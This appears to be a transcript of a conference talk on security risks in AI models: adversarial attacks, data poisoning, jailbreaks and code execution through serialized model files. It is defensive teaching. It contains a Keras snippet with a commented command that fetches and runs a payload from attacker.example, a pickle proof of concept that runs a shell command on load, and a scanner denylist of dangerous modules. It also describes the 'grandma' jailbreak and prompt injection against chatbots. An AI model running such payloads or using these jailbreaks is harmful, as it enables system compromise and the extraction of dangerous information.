
All right, so if you were here for the last talk, this is actually a great follow-up: I'm going to scare you with how dangerous AI can be. My name is CLA Weissman, and I work for HiddenLayer, a startup that does security for AI, which hopefully will become clearer later in my presentation. So let's begin. First I'm going to go over an outline of what I'll talk about today: what adversarial AI is, which hopefully, as security professionals, you have at least heard of, but we'll go over it;
some current dangers; what pre-trained models are; some specific AI threats; some alternative options; what existing workflows for using AI and machine learning in companies look like today; what our current state of security is; and, moving forward, model scanning, which hopefully you've heard of before, as a level of tooling. So first off, adversarial AI. Adversarial AI, put in the simplest terms, is a type of attack that forces an AI model to make a mistake or a misclassification. This can be as benign as having an image of a dog classified as a cat, which doesn't seem
all that harmful, or as serious as a self-driving car not being able to recognize a stop sign. I probably don't need to impress upon you how dangerous that could be, so you can imagine all the different issues this could cause, and I'm sure you've seen examples in the news, whether or not they were labeled as adversarial AI. So first I'm going to go over some of the dangers. Hopefully you've seen some of the examples I'll pull up, and if not, get ready. This first one is an example of data poisoning. It was actually not intentional data poisoning, but there was a long-running joke on the internet about how Australia
didn't actually exist, and Microsoft's Bing unfortunately ingested some of this as training data. So there was a period of time where, if you looked up whether Australia exists, according to Bing's search results it did not. Obviously this is pretty funny, we all know Australia exists, so it isn't all that harmful, but it is damaging to a company that is supposed to be providing good information as a search engine. The second one is also data poisoning: this attack poisoned data such that AI assistants, copilots, and chatbots would suggest malicious code. Obviously there's malicious code on the
internet, but ideally we'd rather not have chatbots helping out with that. This next one is a prompt injection attack on ChatGPT. Many of you have probably seen examples of this: if you ask ChatGPT directly how to make napalm, it will not tell you. But in previous versions of ChatGPT, if you used this type of prompt injection, asking the chatbot to act as your grandmother, a chemical engineer who used to tell you about napalm, it would tell you how to make napalm. Again, yes, this information is available on the internet, but especially in terms of
company ethics and values, this is not something you would want a system embedded in your company to be able to tell someone, and a lot of the chatbots you see on the internet today use ChatGPT on the backend. This last one, if you're in the security space, you probably know about. It was named "Cylance, I Kill You," and it happened in 2019, very close to home for the company I work for; it was actually the precipitating event for our startup. It was a model evasion attack. Cylance was using AI to secure other things, which is AI for security, slightly different, but a threat actor
was able to reverse engineer some API endpoints and completely bypass the model at the end of their attack. This attack was going on for, I want to say, 60 to 90 days, and it was not known about until it was published that Cylance had been attacked. Obviously this was extremely serious, and again, this happened in 2019: these threats have come to the forefront recently, but they have been happening for quite a while. And lastly, one of the even more fun dangers: not only is our AI very vulnerable, AI is also being used as another tool by threat actors, and
obviously if you're a company and you have a chatbot, or you're supporting a chatbot, you don't want it being used to help attack you. Microsoft and OpenAI presented on, or wrote an article about, exactly that, so you can go read that as well. All right, so hopefully you all know why this matters, but if you're not as much in the AI space, you might see ChatGPT as a fun thing to interact with, not a super serious thing to have in production. It's fun to ask questions, but am I
really using it for massive parts of my job? Well: by 2026, more than 80% of enterprises will have used generative AI APIs or models, or deployed GenAI-enabled applications in production environments, up from less than 5% in 2023. Obviously we're in 2024 at this point, so we're already higher than 5%, and that is just talking about generative AI, things like LLMs, chatbots, and copilots; it doesn't count lower-level machine learning models. Currently, most companies have about 1,500 machine learning models in production, and through work with partners and
talking with a lot of people in the space, we've found that a lot of companies don't know how many machine learning models they have deployed, which is obviously very concerning: how are you supposed to protect something if you don't even know where it is, or whether you have
it? Come on... there we go. So now I want to talk about pre-trained models. Everyone probably knows what a chatbot is in general, but when you're interacting with a machine learning model or an AI model, you're interacting with a pre-trained model: it has already been fine-tuned, already been trained, usually on a massive dataset, for a specific task. For instance, ChatGPT's specific task is to respond to your questions and produce the best output for the given input. So what is the threat with that? We heard about prompt injection from the previous speaker, and I'll talk a little bit about that, but the threat is
actually much larger than that. Machine learning models are often serialized, and it is very easy to hide malicious code in serialized files. This is not a new machine learning problem; it's something we've known about, but it has come up again. Given what I said about pre-trained models, they're often huge, so whether you're passing them between people at your company or uploading them to places like Hugging Face, which is a model repository, they're usually serialized because they're otherwise unmanageably large. Each AI or ML framework also has its own unique vulnerabilities: there are serialization vulnerabilities that apply across the board, but each individual framework has its own way of doing
things and its own issues, so there is no one-size-fits-all solution. And at the end of the day, I probably don't need to tell you this, but AI and ML models are code, so any vulnerability you would expect in a regular program applies to machine learning models too, which I think is sometimes lost when you're interacting with something in production.
All right, so I want to talk about some specific model threats, looking at three very popular machine learning frameworks in Python; all of these are great frameworks if you want to research them some more. First off, Keras. Keras allows for code execution in Lambda layers. Lambda layers are a special feature of Keras that lets you add bespoke expressions to your machine learning model to tailor it to your needs. This is a feature Keras has intentionally implemented for that purpose; unfortunately, arbitrary expressions allow for arbitrary code execution as well, and because of the way these layers are serialized, it's harder to catch.
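To make that concrete, here's a minimal sketch, assuming TensorFlow/Keras is installed; the function name and the commented-out payload are purely illustrative, not taken from any real attack:

```python
import tensorflow as tf

def not_so_harmless(x):
    # Looks like a pass-through, but any Python can go here, for example
    # __import__("os").system("curl attacker.example/payload | sh")
    return x

model = tf.keras.Sequential([
    tf.keras.Input(shape=(4,)),
    tf.keras.layers.Lambda(not_so_harmless),  # bespoke expression baked into the model
    tf.keras.layers.Dense(1),
])

# If a model like this is saved and shared, the Lambda body travels with it.
# Newer Keras versions refuse to deserialize it unless the person loading it
# opts in with load_model(..., safe_mode=False), which is exactly the kind of
# opt-in people tend to click through.
```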
TensorFlow allows for exfiltration, code execution, and directory traversal in the way it stores its tensors, and PyTorch allows for code execution. Like I said, these are not esoteric libraries that data scientists are tinkering with on their own; these are the main frameworks. If you find a machine learning model in the wild, it's probably built with one of these three, and if you go on Hugging Face, most models there are in one of these three. So now I want to talk about pickle serialization. Probably all of you have heard of pickle; it's a very, very common serialization method in Python. So is pickle
serialization safe? I asked this question to ChatGPT because I was curious what it would say, and the answer is a pretty resounding no. Not only does serialization in general have its issues, but the way pickle serializes files makes it possible to inject code that will be executed upon deserializing, or "unpickling," the file. And that doesn't even get into whether the file itself is dangerous: just trying to unpickle it, before you can even look at it, opens you up to pretty serious vulnerabilities. If you go look at the official pickle documentation for Python, it tells you the same thing: don't open pickle files if you don't know where they've been.
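Here's a minimal sketch of what that looks like in plain Python; the payload is a clearly labeled echo command rather than anything a real attacker would use:

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild this object on load;
        # here, "rebuilding" means running an arbitrary shell command.
        return (os.system, ("echo 'code ran during unpickling'",))

payload = pickle.dumps(Exploit())

# The victim never calls the attacker's code explicitly; simply
# deserializing the bytes is enough to execute it.
pickle.loads(payload)
```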
Obviously, in an ideal world we would always know the origin of every file we open, but unfortunately, especially with data files, that is not always possible. So, hopefully I've scared you a little bit. Are there alternative options? Well, a little bit. In response to security concerns, Hugging Face, which is a huge model repository, created a new format called safetensors, and this was very exciting for anyone in the machine learning world. Hugging Face is really the main player for storing machine learning models: if you go on
there you can find ChatGPT, you can find Llama, all of these main things are stored there, and just like GitHub, individual contributors have their own spin on things. So Hugging Face implemented the ability to convert existing PyTorch tensors to the safetensors format on their website, so you didn't have to download a new library or redo the saving of your model or anything like that. This sounds great, ease for everyone involved, in theory. Unfortunately, it didn't work out that way. The converter service bot that Hugging Face implemented was actually able to be hijacked: you could upload a machine learning model with
certain malicious code that could impersonate the service bot and create pull requests, containing malicious code, against any model on Hugging Face. Obviously the person who owned the model would need to accept these pull requests, but all of these files are serialized, so if you looked at the diff of the two files in the pull request, you would not be able to tell that it contained malicious code. And given that it came from a Hugging Face service bot, and would probably have been labeled something like "safetensors update" or "safetensors patch," you would be more likely to trust it and accept it. So that's pretty concerning, and an unfortunate reality: there is no single fix. It was also only a solution for PyTorch tensors, not for any of the other formats out there.
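For context on what the format itself does buy you, here's a minimal sketch, assuming the safetensors and torch packages are installed; the tensor names are made up for illustration:

```python
import torch
from safetensors.torch import save_file, load_file

weights = {
    "linear.weight": torch.randn(4, 4),
    "linear.bias": torch.zeros(4),
}

save_file(weights, "model.safetensors")    # pure tensor data plus a JSON header
restored = load_file("model.safetensors")  # loading never runs embedded code

# Contrast with torch.save/torch.load, which go through pickle and can execute
# code hidden in a malicious checkpoint (unless you pass weights_only=True on
# recent PyTorch versions).
```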
So now I want to talk a little bit about some of our existing workflows with machine learning. I'm curious: how many people here have actually coded a machine learning model, or seen the code of one? Okay, so not that many. This is not something that's super prevalent in the security space right now; securing these models is, for sure, but writing them is not. So the common existing workflow
is that these are things being deployed by data scientists and software engineers, and before that happens it can go a number of ways. Maybe you're making the model completely from scratch yourself, but probably not; you're probably using resources from the internet, and you're potentially even downloading a model from Hugging Face, which is very understandable: why break or try to fix models when there are already really good ones out there?
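Just to show how low-friction that step is, here's a minimal sketch assuming the transformers library; the model name is just a common public example:

```python
from transformers import AutoModel

# One line pulls third-party weights off the internet and into your process.
model = AutoModel.from_pretrained("bert-base-uncased")

# Some repositories also ship their own modeling code; opting in runs that
# code locally as part of loading the model:
# model = AutoModel.from_pretrained("some-org/some-model", trust_remote_code=True)
```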
Generally these models then get uploaded to a potentially vulnerable server with very little authentication. And lastly, AI is just being used in general by employees to automate work, whether that's writing an email to your boss that you want to sound a little more official, so you plug it into ChatGPT, or using GitHub Copilot to suggest code for you. And for those of you who use GitHub Copilot, how much do you read the lines it suggests? Maybe you see that they're trash and throw them away, but are you checking, line by line, expression by expression, what you're committing? Probably not. I'm certainly not, and I'm in the security space. And this is the last bullet point: this is largely unchecked. Companies might put out guidance like "please don't use ChatGPT, it's against our company policy," but in reality it's happening everywhere. It's in our emails, it's in
social media, it's in browsers, it's on your bank's website in the chatbot. We can't get away from it.
All right, so what's our current state of security? Most current cybersecurity solutions are not specific to machine learning. This is hopefully not news to anybody: there are a lot of great cybersecurity solutions out there for protecting all manner of things in the tech space, and certain machine learning attacks could potentially be caught by them, but it's not a complete fix; there are specific parts of code, specific attacks, that we don't protect against. There are also organizations like MITRE ATLAS or OWASP that are specifically focused on identifying attacks rather than preventing them. While that is extremely important, it's less valuable to know
what the attack was after it happened; I think we would all much rather have prevented it in the first place and known where the vulnerabilities were before threat actors found them. And as a general statement, though not true across the board, machine learning models are neither checked before entering a company workflow nor routinely checked once they've entered company usage. This is a multi-pronged problem: not only could there be vulnerabilities in your original machine learning code, there could be malware in your original machine learning code, there could be malware in your data, and you
might put up a model that is completely safe at the time, and over time, through data poisoning or through intentional malware attacks, your model is no longer safe. There is really just a lack of checking in that sense. So hopefully I've scared you slightly, or a lot. What does that mean for moving forward? What does it mean about changing the space? We've heard all about how much AI is changing things; we've heard specifically from the Biden Administration about handing down security requirements; but how do we actually implement that? There isn't a plethora of specific tools for it. So: model scanning at every level. Obviously this is not a
simple solution; as I said, each framework has its own quirks, and even just identifying the type of a machine learning file is not a simple problem, but there needs to be model scanning at every level, with framework-specific scanning. So here is the proposed idea. When you're designing a model, there needs to be direct communication and documentation about the provenance of the model: is it made completely in house, what libraries are being used, everything like that, along with a conscious awareness of the security vulnerabilities in these models. As we saw with the vulnerabilities in TensorFlow, Keras, and PyTorch, a lot of these vulnerabilities come from specific
features that these frameworks provide, so you can't just make a blanket rule like "I'm not going to use any code that has any known vulnerabilities"; that's probably not possible, and these are just the vulnerabilities we know about right now. In pre-deployment, again, scanning: any time the model changes hands, it gets scanned, and the data gets scanned. And lastly, post-deployment: continuous scanning of the model, and also monitoring of what is happening with it. Who has access to this model? Who is sending inputs to it? Where is it living within the company workspace?
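As one small, hedged example of what "continuous" can mean in practice, here's a sketch that just re-hashes a deployed artifact on a schedule; it catches a silently swapped file, not data poisoning, and the path and interval are made up:

```python
import hashlib
import time

def sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def monitor(path: str, expected: str, interval_seconds: int = 3600) -> None:
    while True:
        digest = sha256(path)
        if digest != expected:
            # In a real deployment this would page someone and/or quarantine the model.
            print(f"ALERT: {path} changed, got {digest}")
        time.sleep(interval_seconds)

# monitor("/models/fraud-detector-v3.pt", expected="<known-good digest>")
```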
If you've seen any of the fun prompt injection attacks on chatbots on bank websites: often these chatbots may be there just to help you get to the right person in the company to ask for help, but they can often spit out information like their training data, or executives' potential account information. So even if you haven't given them specific information, or you've put guardrails on things like chatbots, they potentially have access to more information than you realize. All right, so again, hopefully I've scared you a little bit and educated you on what machine learning and AI look like in the security space. Does anyone have any questions? [Audience question, from the back: what does it mean to scan a model?] Yeah, exactly, sorry, I should
have mentioned that. Scanning a model: like I said with pickle serialization, this obviously needs to be some sort of static analysis. You can't open the file, so it basically needs to be a byte-by-byte scan, so that we can fully understand what's in the model without opening it before we have any understanding of what it contains. [Audience follow-up] Yeah, exactly.
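To give a flavor of what a static scan can look like, here is a toy sketch using Python's standard pickletools module; this is not how HiddenLayer's scanner works, and the denylist and heuristics are illustrative only:

```python
import pickletools

# Modules a serialized model has no obvious legitimate reason to import.
DENYLIST = {"os", "posix", "nt", "subprocess", "socket", "builtins"}

def scan_pickle(data: bytes):
    """Walk the pickle opcode stream without ever deserializing it."""
    findings = []
    recent_strings = []  # STACK_GLOBAL pulls module/name from earlier string constants
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            recent_strings.append(arg)
        elif op.name == "GLOBAL":  # arg looks like "module name"
            if arg.split()[0] in DENYLIST:
                findings.append((pos, arg))
        elif op.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2 and recent_strings[-2] in DENYLIST:
                findings.append((pos, ".".join(recent_strings[-2:])))
    return findings

# Example: the Exploit payload from earlier would be flagged as an os import.
# print(scan_pickle(open("model.pkl", "rb").read()))
```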
[Audience question] No, there is not an alternative that is safe. There are some other serialization options, but all of them just have different problems: HDF5 is another serialization format, and ONNX allows you to save your models in a slightly different way, but at the end of the day, no, there is not a single solution. [Audience question: what gives the scanner the confidence to determine whether it's a good file or a bad file?] Yeah, so at least in the case of my company, we have specific malware that we have identified as unsafe. There are different levels: there is specific malware we are looking for, whether that's certain libraries or certain code, and then
there are also just general things we're looking for that we know are easy to exploit. So there are two levels: your model is unsafe, it has been attacked; or your model has security vulnerabilities. And that's all through specific research we've done, things we've found inside models before. [Audience question: could someone obfuscate the data so that when you scan it, before you deserialize it, you miss it?] We haven't run into issues with that specifically. Do you mean it would be obfuscated in a way that we wouldn't be able to detect that something was unsafe? [Audience: yeah, because you're scanning the serialized data, right? So it could be obfuscated in a way that, once serialized,
the malicious content is there, but you're scanning it, so you may not see it.] We haven't come across that with the way we're, I don't want to say "opening" pickle files, because that's not the correct term, but we are doing a static scan of the serialized data. [Audience question: are there safer ways to deserialize?] Probably the best answer would be to open your files in a sandbox; don't open them on your own computer. But again, no, not in general, not really. All right, well, thank you all so much. [Applause]